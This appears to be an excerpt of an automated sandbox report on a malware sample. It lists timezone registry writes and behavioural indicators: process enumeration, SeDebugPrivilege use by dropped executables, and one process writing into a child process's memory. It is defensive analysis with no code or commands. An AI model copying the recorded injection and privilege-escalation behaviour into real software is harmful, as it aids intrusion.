Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2431 = "Cuba Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2341 = "Haiti Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1971 = "Belarus Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1832 = "Russia TZ 2 Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2041 = "Eastern Daylight Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1841 = "Russia TZ 4 Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2791 = "Novosibirsk Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-3142 = "South Sudan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2452 = "Saint Pierre Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2002 = "Cabo Verde Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2371 = "Easter Island Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2451 = "Saint Pierre Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2181 = "Astrakhan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1862 = "Russia TZ 6 Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2321 = "Sakhalin Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3dQ43Ii.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3dQ43Ii.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3dQ43Ii.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\kos4.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-57ARK.tmp\LzmwAqmV.tmp N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4884 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\478fba5ae931b66d2404c146c83df1d1cda769f1bfe0dbc672bd8aa23194253b.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Gi7qY30.exe
